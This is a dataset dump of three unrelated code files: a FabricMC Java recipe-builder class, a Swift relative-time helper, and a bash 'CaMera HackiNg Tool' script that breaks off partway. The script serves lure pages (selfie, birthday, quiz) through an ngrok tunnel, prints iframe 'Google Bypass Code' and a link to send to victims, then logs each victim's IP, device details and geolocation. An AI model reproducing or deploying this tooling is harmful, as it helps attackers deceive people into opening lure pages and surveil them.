text stringlengths 1 1.05M |
|---|
/*
* Copyright (c) 2016, 2017, 2018, 2019 FabricMC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package net.fabricmc.fabric.api.recipe.v1;
import it.unimi.dsi.fastutil.chars.Char2ObjectMap;
import it.unimi.dsi.fastutil.chars.Char2ObjectOpenHashMap;
import it.unimi.dsi.fastutil.chars.CharArraySet;
import it.unimi.dsi.fastutil.chars.CharSet;
import net.minecraft.item.Item;
import net.minecraft.item.ItemConvertible;
import net.minecraft.item.ItemStack;
import net.minecraft.recipe.*;
import net.minecraft.tag.Tag;
import net.minecraft.util.Identifier;
import net.minecraft.util.collection.DefaultedList;
import java.util.HashSet;
import java.util.Objects;
import java.util.Set;
/**
* Provides some recipe builders for Vanilla recipes.
*
* @version 1.0.0
* @since 1.0.0
*/
public final class VanillaRecipeBuilders {
private VanillaRecipeBuilders() {
throw new UnsupportedOperationException("Someone tampered with the universe.");
}
/**
* Returns the list of ingredients for shaped crafting recipes.
*
* @param pattern the pattern of the shaped crafting recipe
* @param keys the keys and ingredients of the recipe
* @param width the width of the shaped crafting recipe
* @param height the height of the shaped crafting recipe
* @return the ingredients
* @throws IllegalStateException if a key has no assigned ingredient or if there is an ingredient but no assigned key
*/
public static DefaultedList<Ingredient> getIngredients(String[] pattern, Char2ObjectMap<Ingredient> keys, int width, int height) {
DefaultedList<Ingredient> ingredients = DefaultedList.ofSize(width * height, Ingredient.EMPTY);
CharSet patternSet = new CharArraySet(keys.keySet());
patternSet.remove(' ');
for (int i = 0; i < pattern.length; ++i) {
for (int j = 0; j < pattern[i].length(); ++j) {
char key = pattern[i].charAt(j);
Ingredient ingredient = keys.get(key);
if (ingredient == null) {
throw new IllegalStateException("Pattern references symbol '" + key + "' but it's not defined in the key");
}
patternSet.remove(key);
ingredients.set(j + width * i, ingredient);
}
}
if (!patternSet.isEmpty()) {
throw new IllegalStateException("Key defines symbols that aren't used in pattern: " + patternSet);
} else {
return ingredients;
}
}
/**
* Returns a new shaped crafting recipe builder.
*
* @param pattern the pattern of the shaped crafting recipe
* @return the builder
*/
public static ShapedRecipeBuilder shapedRecipe(String[] pattern) {
return new ShapedRecipeBuilder(pattern);
}
/**
* Returns a new shapeless crafting recipe builder.
*
* @param output the output stack
* @return the builder
*/
public static ShapelessRecipeBuilder shapelessRecipe(ItemStack output) {
return new ShapelessRecipeBuilder(output);
}
/**
* Returns a new stone cutting recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @param input the input ingredient
* @param output the output item stack
* @return the stone cutting recipe
*/
public static StonecuttingRecipe stonecuttingRecipe(Identifier id, String group, Ingredient input, ItemStack output) {
if (input == Ingredient.EMPTY) throw new IllegalArgumentException("Input cannot be empty.");
return new StonecuttingRecipe(id, group, input, output);
}
/**
* Returns a new smelting recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @param input the input ingredient
* @param output the output item stack
* @param experience the experience given
* @param cookTime the cook time in ticks
* @return the smelting recipe
*/
public static SmeltingRecipe smeltingRecipe(Identifier id, String group, Ingredient input, ItemStack output, float experience, int cookTime) {
if (input == Ingredient.EMPTY) throw new IllegalArgumentException("Input cannot be empty.");
if (cookTime < 0) throw new IllegalArgumentException("Cook time must be equal or greater than 0");
return new SmeltingRecipe(id, group, input, output, experience, cookTime);
}
/**
* Returns a new blasting recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @param input the input ingredient
* @param output the output item stack
* @param experience the experience given
* @param cookTime the cook time in ticks
* @return the blasting recipe
*/
public static BlastingRecipe blastingRecipe(Identifier id, String group, Ingredient input, ItemStack output, float experience, int cookTime) {
if (input == Ingredient.EMPTY) throw new IllegalArgumentException("Input cannot be empty.");
if (cookTime < 0) throw new IllegalArgumentException("Cook time must be equal or greater than 0");
return new BlastingRecipe(id, group, input, output, experience, cookTime);
}
/**
* Returns a new smoking recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @param input the input ingredient
* @param output the output item stack
* @param experience the experience given
* @param cookTime the cook time in ticks
* @return the smoking recipe
*/
public static SmokingRecipe smokingRecipe(Identifier id, String group, Ingredient input, ItemStack output, float experience, int cookTime) {
if (input == Ingredient.EMPTY) throw new IllegalArgumentException("Input cannot be empty.");
if (cookTime < 0) throw new IllegalArgumentException("Cook time must be equal or greater than 0");
return new SmokingRecipe(id, group, input, output, experience, cookTime);
}
/**
* Returns a new campfire cooking recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @param input the input ingredient
* @param output the output item stack
* @param experience the experience given
* @param cookTime the cook time in ticks
* @return the campfire cooking recipe
*/
public static CampfireCookingRecipe campfireCookingRecipe(Identifier id, String group, Ingredient input,
ItemStack output, float experience, int cookTime) {
if (input == Ingredient.EMPTY) throw new IllegalArgumentException("Input cannot be empty.");
if (cookTime < 0) throw new IllegalArgumentException("Cook time must be equal or greater than 0");
return new CampfireCookingRecipe(id, group, input, output, experience, cookTime);
}
/**
* Represents a shaped crafting recipe builder.
*/
public static final class ShapedRecipeBuilder {
private final String[] pattern;
private final int width;
private final int height;
private final Char2ObjectMap<Ingredient> ingredients = new Char2ObjectOpenHashMap<>();
private ItemStack output;
/**
* Creates a new shaped recipe builder.
*
* @param pattern the pattern of the shaped recipe. Each string in this array is a line of ingredients.
* A character represents an ingredient and space is no ingredient
*/
public ShapedRecipeBuilder(String[] pattern) {
this.pattern = pattern;
this.width = pattern[0].length();
this.height = pattern.length;
}
/**
* Puts the specified ingredient at the specified key.
*
* @param key the key of the ingredient
* @param ingredient the ingredient
* @return this builder
*/
public ShapedRecipeBuilder ingredient(char key, Ingredient ingredient) {
boolean success = false;
for (String line : pattern) {
for (int i = 0; i < line.length(); i++) {
char c = line.charAt(i);
if (c == key) {
this.ingredients.put(key, ingredient);
success = true;
break;
}
}
if (success) break;
}
return this;
}
/**
* Puts the specified items as the accepted ingredient at the specified key.
*
* @param key the key of the ingredient
* @param items the items as ingredient
* @return this builder
* @see #ingredient(char, Ingredient)
*/
public ShapedRecipeBuilder ingredient(char key, ItemConvertible... items) {
return this.ingredient(key, Ingredient.ofItems(items));
}
/**
* Puts the specified item tag as the accepted ingredient at the specified key.
*
* @param key the key of the ingredient
* @param tag the item tag as ingredient
* @return this builder
* @see #ingredient(char, Ingredient)
*/
public ShapedRecipeBuilder ingredient(char key, Tag<Item> tag) {
return this.ingredient(key, Ingredient.fromTag(tag));
}
/**
* Puts the specified item stacks as the accepted ingredient at the specified key.
*
* @param key the key of the ingredient
* @param stacks the item stacks as ingredient
* @return this builder
* @see #ingredient(char, Ingredient)
*/
public ShapedRecipeBuilder ingredient(char key, ItemStack... stacks) {
return this.ingredient(key, Ingredient.ofStacks(stacks));
}
/**
* Sets the output of the shaped crafting recipe.
*
* @param stack the output item stack.
* @return this builder
*/
public ShapedRecipeBuilder output(ItemStack stack) {
this.output = stack;
return this;
}
/**
* Builds the shaped crafting recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @return the shaped recipe
*/
public ShapedRecipe build(Identifier id, String group) {
Objects.requireNonNull(this.output, "The output stack cannot be null.");
DefaultedList<Ingredient> ingredients = getIngredients(this.pattern, this.ingredients, this.width, this.height);
return new ShapedRecipe(id, group, this.width, this.height, ingredients, this.output);
}
}
public static final class ShapelessRecipeBuilder {
private final Set<Ingredient> ingredients = new HashSet<>();
private ItemStack output;
public ShapelessRecipeBuilder(ItemStack output) {
this.output = output;
}
/**
* Adds an ingredient.
*
* @param ingredient the ingredient
* @return this builder
*/
public ShapelessRecipeBuilder ingredient(Ingredient ingredient) {
this.ingredients.add(ingredient);
return this;
}
/**
* Puts the specified items as the accepted ingredient at the specified key.
*
* @param items the items as ingredient
* @return this builder
* @see #ingredient(Ingredient)
*/
public ShapelessRecipeBuilder ingredient(ItemConvertible... items) {
return this.ingredient(Ingredient.ofItems(items));
}
/**
* Adds the specified item tag as an ingredient.
*
* @param tag the item tag as ingredient
* @return this builder
* @see #ingredient(Ingredient)
*/
public ShapelessRecipeBuilder ingredient(Tag<Item> tag) {
return this.ingredient(Ingredient.fromTag(tag));
}
/**
* Adds item stacks as an ingredient.
*
* @param stacks the item stacks as ingredient
* @return this builder
* @see #ingredient(Ingredient)
*/
public ShapelessRecipeBuilder ingredient(ItemStack... stacks) {
return this.ingredient(Ingredient.ofStacks(stacks));
}
/**
* Sets the output of the shapeless crafting recipe.
*
* @param stack the output item stack.
* @return this builder
*/
public ShapelessRecipeBuilder output(ItemStack stack) {
this.output = stack;
return this;
}
/**
* Builds the shapeless crafting recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @return the shapeless crafting recipe
*/
public ShapelessRecipe build(Identifier id, String group) {
Objects.requireNonNull(this.output, "The output stack cannot be null.");
if (ingredients.size() == 0) throw new IllegalStateException("Cannot build a recipe without ingredients.");
DefaultedList<Ingredient> ingredients = DefaultedList.ofSize(this.ingredients.size(), Ingredient.EMPTY);
int i = 0;
for (Ingredient ingredient : this.ingredients) {
ingredients.set(i, ingredient);
i++;
}
return new ShapelessRecipe(id, group, this.output, ingredients);
}
}
} |
import Foundation
func timeAgoSinceDate(_ date: Date, currentDate: Date) -> String {
let calendar = Calendar.current
let components = calendar.dateComponents([.year, .month, .day, .hour, .minute, .second], from: date, to: currentDate)
if let years = components.year, years > 0 {
return years == 1 ? "1 year ago" : "\(years) years ago"
} else if let months = components.month, months > 0 {
return months == 1 ? "1 month ago" : "\(months) months ago"
} else if let days = components.day, days > 0 {
return days == 1 ? "1 day ago" : "\(days) days ago"
} else if let hours = components.hour, hours > 0 {
return hours == 1 ? "1 hour ago" : "\(hours) hours ago"
} else if let minutes = components.minute, minutes > 0 {
return minutes == 1 ? "1 minute ago" : "\(minutes) minutes ago"
} else if let seconds = components.second, seconds > 0 {
return seconds == 1 ? "1 second ago" : "\(seconds) seconds ago"
} else {
return "Just now"
}
}
// Test the function
let formatter = DateFormatter()
formatter.dateFormat = "yyyy MM dd HH:mm:ss.SSS"
let date0 = formatter.date(from: "2014 11 05 18:15:12.000")!
let date1 = formatter.date(from: "2014 11 07 18:15:12.000")!
let timeElapsed = timeAgoSinceDate(date0, currentDate: date1)
print(timeElapsed) // Output: 2 days ago |
dependencies() {
echo
command -v zip > /dev/null 2>&1 || { echo -e >&2 "\e[94m➟ \e[92mNeed ZIP installing it....." && apt install zip > /dev/null 2>&1;}
command -v php > /dev/null 2>&1 || { echo -e >&2 "\e[94m➟ \e[92mNeed PHP installing it....." && apt install php > /dev/null 2>&1;}
command -v curl > /dev/null 2>&1 || { echo -e >&2 "\e[94m➟ \e[92mNeed CURL installing it....." && apt install curl > /dev/null 2>&1;}
command -v wget > /dev/null 2>&1 || { echo -e >&2 "\e[94m➟ \e[92mNeed WGET installing it....." && apt install wget > /dev/null 2>&1;}
command -v git > /dev/null 2>&1 || { echo -e >&2 "\e[94m➟ \e[92mNeed GIT installing it....." && apt install git > /dev/null 2>&1;}
echo
}
dependencies
banner() {
clear
echo -e '\e[91m
....
.:-----========:
=%%%%%%%%%%%%%%%%%#+=:-**-
-%%%%%%%#*+%%*%%%%%%%#+--+=.
:##*=. =%..%*-#%%%%%%%-.+-
:*++=. *# -%%#%%%=.%+:*#--=
.+%*=-. :%= +%%%%+ +%: =#*:-
:::##*=: -##=::::-#*. -=+*#:
.-:-*%**=..-=++=-. .:-=+**%%.
:+=:-+#%%%#****#**+=-:: .
-===========---::..
.....
echo
echo -e ' \e[92m::: Tool By DARKNOOBHACKERS:::\e[0m'
echo -e "\e[92m"
echo -e ' \e[100m CaMera HackiNg Tool\e[0m'
echo
}
menu() {
echo -e " \e[93m[\e[32m1\e[93m]\e[93m➟ \e[92mSTART\e[0m"
echo -e " \e[93m[\e[32m2\e[93m]\e[93m➟ \e[92mUPDATE\e[0m"
echo -e " \e[93m[\e[32m3\e[93m]\e[93m➟ \e[92mABOUT\e[0m"
echo -e " \e[93m[\e[32m4\e[93m]\e[93m➟ \e[92mMORE\e[0m"
echo -e " \e[93m[\e[32m5\e[93m]\e[93m➟ \e[92mFOLLOW\e[0m"
echo -e " \e[93m[\e[32m6\e[93m]\e[93m➟ \e[92mVIDEO\e[0m"
echo -e " \e[93m[\e[32m7\e[93m]\e[93m➟ \e[92mCHAT NOW\e[0m"
echo -e " \e[93m[\e[32m8\e[93m]\e[93m➟ \e[92mRESTART\e[0m"
echo -e " \e[93m[\e[32m0\e[93m]\e[93m➟ \e[92mEXIT\e[0m"
echo
echo -ne "\e[92mSelect Option\e[92m: \e[34m"
read sit
if [[ "$sit" = "1" || "$sit" = "one" ]];
then
pagemenu
elif [[ "$sit" = "2" || "$sit" = "two" ]];
then
echo -e " SOON I WILL UPDATE"
elif [[ "$sit" = "3" || "$sit" = "three" ]];
then
about
elif [[ "$sit" = "4" || "$sit" = "four" ]];
then
fi
}
pagemenu() {
banner
echo -e " \e[93m[\e[32m1\e[93m]\e[93m➟ \e[92mSelFie\e[0m"
echo -e " \e[93m[\e[32m2\e[93m]\e[93m➟ \e[92mQuIz\e[0m"
echo -e " \e[93m[\e[32m3\e[93m]\e[93m➟ \e[92mGuEss\e[0m"
echo -e " \e[93m[\e[32m4\e[93m]\e[93m➟ \e[92mSpinWheel\e[0m"
echo -e " \e[93m[\e[32m5\e[93m]\e[93m➟ \e[92mHopGame\e[0m"
echo -e " \e[93m[\e[32m6\e[93m]\e[93m➟ \e[92mBirthDay\e[0m"
echo -e " \e[93m[\e[32m7\e[93m]\e[93m➟ \e[92mWishBook\e[0m"
echo -e " \e[93m[\e[32m8\e[93m]\e[93m➟ \e[92mRPSGame\e[0m"
echo -e " \e[93m[\e[32m9\e[93m]\e[93m➟ \e[92mFireWorks\e[0m"
echo -e " \e[93m[\e[32m10\e[93m]\e[93m➟ \e[92mHappyNewYear\e[0m"
echo
echo -ne "\e[92mSelect Option\e[92m: \e[34m"
read selc
if [[ "$selc" == "1" || "$selc" == "one" || "$selc" == "selfie" ]];
then
site="selfie"
rm -rf webs/$site/even.html > /dev/null 2>&1
start
elif [[ "$selc" == "2" || "$selc" == "two" || "$selc" == "quiz" ]]
then
site="quiz"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "3" || "$selc" == "three" || "$selc" == "guess" ]]
then
site="guess"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "4" || "$selc" == "four" || "$selc" == "spinwheel" ]]
then
site="spinwheel"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "5" || "$selc" == "five" || "$selc" == "hopgame" ]]
then
site="game"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "6" || "$selc" == "six" || "$selc" == "birthday" ]]
then
birthday
rm -rf webs/$site/option.html > /dev/null 2>&1
elif [[ "$selc" == "7" || "$selc" == "seven" || "$selc" == "wishbook" ]]
then
book
elif [[ "$selc" == "8" || "$selc" == "eight" || "$selc" == "rpsgame" ]]
then
site="rps"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "9" || "$selc" == "nine" || "$selc" == "firework" ]]
then
firework
rm -rf webs/$site/option.html > /dev/null 2>&1
elif [[ "$selc" == "10" || "$selc" == "ten" || "$selc" == "hny" ]]
then
boxwish
rm -rf webs/$site/option.html > /dev/null 2>&1
elif [[ "$selc" == "00" || "$selc" == "exit" || "$selc" == "exit" ]]
then
banner
menu
fi
}
birthday() {
echo
echo -e " \e[92m[\e[34m1\e[92m]\e[92m➟ \e[93mDefault\e[0m \e[92m[\e[34m2\e[92m]\e[92m➟ \e[93mCustom\e[0m "
echo
echo -ne "\e[92mSELECT OPTION\e[0m: \e[92m"
read selc
if [[ "$selc" == "1" || "$selc" == "one" || "$selc" == "default" ]];
then
site="birthday"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "2" || "$selc" == "two" || "$selc" == "custom" ]];
then
site="birthday"
rm -rf webs/$site/option.html > /dev/null 2>&1
echo " "
echo -e "\e[94m<<\e[93mcustom options require input actions\e[94m>>\e[92m"
echo " "
echo -e "\e[93mEvent Name: "
read event
echo -e "\e[93mPerson Name: "
read person
echo "Wish Message: "
read msg
echo
echo -e "\e[94m <<\e[93mcustom template created\e[94m>>\e[92m"
sed "6s|\(.*\)|<legend> <h2 class="text_head">$event</h2></legend>|" webs/$site/$site.html > option.html && mv option.html webs/$site
sed "7s|\(.*\)|<h2 class="text">$person</h2>|" webs/$site/option.html > random.html && mv random.html webs/$site
sed "8s|\(.*\)|<h2 class="text">$msg</h2>|" webs/$site/random.html > custom.html && mv custom.html webs/$site
rm -rf webs/$site/random.html > /dev/null 2>&1
start
fi
}
book() {
echo
echo -e " \e[92m[\e[34m1\e[92m]\e[92m➟ \e[93mDefault\e[0m \e[92m[\e[34m2\e[92m]\e[92m➟ \e[93mCustom\e[0m "
echo
echo -ne "\e[92mSELECT OPTION\e[0m: \e[92m"
read selc
if [[ "$selc" == "1" || "$selc" == "one" || "$selc" == "default" ]];
then
site="book"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "2" || "$selc" == "two" || "$selc" == "custom" ]];
then
site="book"
rm -rf webs/$site/option.html > /dev/null 2>&1
echo " "
echo -e "\e[94m<<\e[93mcustom options require input actions\e[94m>>\e[92m"
echo " "
echo -e "\e[93mEvent Name: "
read event
echo -e "\e[93mWish Message: "
read msg
echo
echo -e "\e[94m <<\e[93mcustom template created\e[94m>>\e[92m"
sed "32s|\(.*\)|<p id="head">$event</p>|" webs/$site/$site.html > option.html && mv option.html webs/$site
sed "33s|\(.*\)|<p>$msg</p>|" webs/$site/option.html > custom.html && mv custom.html webs/$site
start
fi
}
firework() {
echo
echo -e " \e[92m[\e[34m1\e[92m]\e[92m➟ \e[93mDefault\e[0m \e[92m[\e[34m2\e[92m]\e[92m➟ \e[93mCustom\e[0m "
echo
echo -ne "\e[92mSELECT OPTION\e[0m: \e[92m"
read selc
if [[ "$selc" == "1" || "$selc" == "one" || "$selc" == "default" ]];
then
site="firework"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "2" || "$selc" == "two" || "$selc" == "custom" ]];
then
site="firework"
rm -rf webs/$site/option.html > /dev/null 2>&1
echo " "
echo -e "\e[94m<<\e[93mcustom options require input actions\e[94m>>\e[92m"
echo " "
echo -e "\e[93mEvent Name: "
read event
echo -e "\e[93mPerson Name: "
read msg
echo
echo -e "\e[94m <<\e[93mcustom template created\e[94m>>\e[92m"
sed "5s|\(.*\)|<center><h1>$event</h1><center>|" webs/$site/$site.html > option.html && mv option.html webs/$site
sed "7s|\(.*\)|<h2>$msg<h2>|" webs/$site/option.html > custom.html && mv custom.html webs/$site
start
fi
}
boxwish() {
echo
echo -e " \e[92m[\e[34m1\e[92m]\e[92m➟ \e[93mDefault\e[0m \e[92m[\e[34m2\e[92m]\e[92m➟ \e[93mCustom\e[0m "
echo
echo -ne "\e[92mSELECT OPTION\e[0m: \e[92m"
read selc
if [[ "$selc" == "1" || "$selc" == "one" || "$selc" == "default" ]];
then
site="boxwish"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "2" || "$selc" == "two" || "$selc" == "custom" ]];
then
site="boxwish"
rm -rf webs/$site/option.html > /dev/null 2>&1
echo " "
echo -e " \e[94m<<\e[93mcustom options require input actions\e[94m>>\e[92m"
echo " "
echo -e "\e[93mEvent Name: "
read event
echo -e "\e[93mPerson Name: "
read person
echo
echo -e " \e[94m <<\e[93mcustom template created\e[94m>>\e[92m"
sed "10s|\(.*\)|<h1>$event</h1>|" webs/$site/$site.html > option.html && mv option.html webs/$site
sed "11s|\(.*\)|<h2>$person</h2>|" webs/$site/option.html > custom.html && mv custom.html webs/$site
start
fi
}
start() {
if [[ -e webs/$site/ip.txt ]]; then
rm webs/$site/ip.txt 2>&1
fi
if [[ -e webs/$site/index.php ]]; then
rm webs/$site/index.php 2>&1
fi
if [[ -e webs/$site/index.html ]]; then
rm webs/$site/index.html 2>&1
fi
if [[ -e webs/$site/Log.log ]]; then
rm webs/$site/Log.log 2>&1
fi
if [[ -e webs/$site/template.html ]]; then
rm webs/$site/template.html 2>&1
fi
if [[ -e ngrok ]]; then
echo ""
else
echo
printf "\e[1;92m[\e[34m•\e[1;92m] Downloading Ngrok...\n"
arch=$(uname -a | grep -o 'arm')
if [[ $arch == *'arm'* ]]; then
wget https://bin.equinox.io/a/e93TBaoFgZw/ngrok-2.2.8-linux-arm.zip > /dev/null 2>&1
if [[ -e ngrok-2.2.8-linux-arm.zip ]]; then
unzip ngrok-2.2.8-linux-arm.zip > /dev/null 2>&1
rm -rf $HOME/.ngrok2 > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok-2.2.8-linux-arm.zip
else
echo
printf "\e[1;93m[!] Download error... Termux, run:\e[0m\e[1;77m pkg install wget\e[0m\n"
exit 1
fi
else
wget https://github.com/noob-hackers/impstuff/raw/main/ngrok%2Bwifi%2Bdata.zip > /dev/null 2>&1
if [[ -e ngrok+wifi+data.zip ]]; then
unzip ngrok+wifi+data.zip > /dev/null 2>&1
rm -rf $HOME/.ngrok2 > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok+wifi+data.zip
else
echo
printf "\e[1;93m[!] Unable to download \e[0m\n"
exit 1
fi
fi
fi
if [[ -e webs/$site/option.html ]]; then
echo -e "\e[1;92m[\e[34m•\e[1;92m] Starting Host Server..."
cd webs/$site && mv custom.html template.html && php -S 127.0.0.1:3333 > /dev/null 2>&1 &
sleep 8
echo -e "\e[1;92m[\e[34m•\e[1;92m] Starting Ngrok Server..."
./ngrok http 3333 > /dev/null 2>&1 &
sleep 10
else
echo -e "\e[1;92m[\e[34m•\e[1;92m] Starting Host Server..."
cd webs/$site && cp $site.html template.html && php -S 127.0.0.1:3333 > /dev/null 2>&1 &
sleep 8
echo -e "\e[1;92m[\e[34m•\e[1;92m] Starting Ngrok Server..."
./ngrok http 3333 > /dev/null 2>&1 &
sleep 10
fi
link=$(curl -s -N http://127.0.0.1:4040/status | grep -o "https://[0-9A-Za-z.-]*\.ngrok.io")
status=$(curl -s -o /dev/null -I -w "%{http_code}" $link)
stat=$(echo "$status")
if [ "$stat" = "200" ];
then
echo -e "\e[1;92m[\e[34m•\e[1;92m] Link working code \e[34m[\e[0m200\e[34m]\e[0m"
touch bypass.html
cat > bypass.html << EOF
<iframe name="$site" src="$link" width="100%" height="100%" frameborder="0" scrolling="yes" style="width: 100%;"> </iframe>
EOF
bypass=$(cat bypass.html)
echo -e "\e[92m[-------------\e[34mGoogle Bypass Code\e[92m-------------]\e[91m"
echo -e "\e[0m$bypass \e[0m"
echo -e "\e[92m[-----------\e[34mUse This Code in Github\e[92m----------]\e[92m"
echo
sed 's+forwarding_link+'$link'+g' webs/$site/template.html > webs/$site/index.html
sed 's+forwarding_link+'$link'+g' webs/$site/forward.php > webs/$site/index.php
echo -e "\e[1;92m[\e[34m•\e[1;92m] Send This Link: \e[0m$link\e[0m"
checkfound
else
echo -e "\e[1;92m[\e[34m•\e[1;92m] Link working code \e[34m[\e[91m000\e[34m]\e[0m"
echo
touch bypass.html
cat > bypass.html << EOF
<iframe name="$site" src="$link" width="100%" height="100%" frameborder="0" scrolling="yes" style="width: 100%;"> </iframe>
EOF
bypass=$(cat bypass.html)
echo -e "\e[92m[-------------\e[34mGoogle Bypass Code\e[92m-------------]\e[91m"
echo -e "\e[0m$bypass \e[0m"
echo -e "\e[92m[-----------\e[34mUse This Code in Github\e[92m----------]\e[92m"
sed 's+forwarding_link+'$link'+g' webs/$site/template.html > webs/$site/index.html
sed 's+forwarding_link+'$link'+g' webs/$site/forward.php > webs/$site/index.php
echo -e "\e[1;92m[\e[34m•\e[1;92m] Send This Link: \e[0m$link\e[0m"
#merge
checkfound
fi
}
checkfound() {
echo ' '
echo -e "\e[1;93m[\e[0m\e[34m•\e[0m\e[1;93m] Waiting for victim to open link...\e[0m\n"
while [ true ]; do
if [[ -e "webs/$site/ip.txt" ]]; then
echo
echo -e "\e[92m------------------------\e[34mVICTIM FOUND\e[92m-------------------------\e[0m"
echo ' '
echo -e "\e[1;92m[\e[34m•\e[1;92m] Device info found..."
echo ' '
catch_ip
sleep 1.0
fi
done
}
catch_ip() {
ip=$( egrep '(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))' webs/$site/ip.txt | cut -d " " -f2 | tr -d '\r')
IFS=$'\n'
ua=$(grep 'User-Agent:' webs/$site/ip.txt | cut -d '"' -f2)
echo -e "\e[1;93m[\e[0m\e[1;77m*\e[0m\e[1;93m] User-Agent:\e[0m$ua\e[0m\e[1;77m\e[0m\n"
chk=$(fmt -20 webs/$site/ip.txt)
sch=$(echo "$chk" > cod.txt)
dom1=$(sed -n '5p' cod.txt | cut -d"(" -f2 | cut -d";" -f1)
dom2=$(sed -n '6p' cod.txt | cut -d"(" -f2 | cut -d";" -f1)
dom3=$(sed -n '7p' cod.txt | cut -d";" -f2 | cut -d")" -f1)
dom4=$(sed -n '11p' cod.txt | cut -d "/" -f1)
dom5=$(sed -n '11p' cod.txt | cut -d " " -f2 | cut -d"/" -f2)
dom6=$(sed -n '12p' cod.txt | cut -d"(" -f2 | cut -d")" -f1)
echo -e "\e[1;92m[\e[0m\e[1;34m★ \e[0m\e[1;92m] Kernel:\e[1;0m$dom1\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m★ \e[0m\e[1;92m] Os:\e[1;0m$dom2\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m★ \e[0m\e[1;92m] Model:\e[1;0m$dom3\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m★ \e[0m\e[1;92m] Browser:\e[0m$dom4\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m★ \e[0m\e[1;92m] Version:\e[1;0m$dom5\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m★ \e[0m\e[1;92m] Device:\e[1;0m$dom6\e[0m"
cat webs/$site/ip.txt >> webs/$site/saved.ip.txt
if [[ -e location.txt ]]; then
rm -rf location.txt
fi
IFS='\n'
iptracker=$(curl -s -L "http://ipwhois.app/json/$ip" --user-agent "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" > location.txt && grep -o '"[^"]*"\s*:\s*"[^"]*"' location.txt > track.txt)
IFS=$'\n'
iptt=$(sed -n 's/"ip"://p' track.txt)
if [[ $iptt != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Device ip: \e[0m$iptt\e[0m"
fi
iptype=$(sed -n 's/"type"://p' track.txt)
if [[ $iptype != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] IP type: \e[0m$iptype\e[0m"
fi
continent=$(sed -n 's/"continent"://p' track.txt)
if [[ $continent != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Continent: \e[0m$continent\e[0m"
fi
country=$(sed -n 's/"country"://p' track.txt)
if [[ $country != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Country: \e[0m$country\e[0m"
fi
flag=$(sed -n 's/"country_flag"://p' track.txt)
if [[ $flag != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Country flag: \e[0m$flag\e[0m"
fi
cap=$(sed -n 's/"country_capital"://p' track.txt)
if [[ $cap != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Country capital: \e[0m$cap\e[0m"
fi
phon=$(sed -n 's/"country_phone"://p' track.txt)
if [[ $phon != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Country code: \e[0m$phon\e[0m"
fi
region=$(sed -n 's/"region"://p' track.txt)
if [[ $region != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] State: \e[0m$region\e[0m"
fi
city=$(sed -n 's/"city"://p' track.txt)
if [[ $city != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] City: \e[0m$city\e[0m"
fi
isp=$(sed -n 's/"isp"://p' track.txt)
if [[ $isp != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Isp: \e[0m$isp\e[0m"
fi
ccode=$(sed -n 's/"currency_code"://p' track.txt)
if [[ $ccode != "" ]]; then
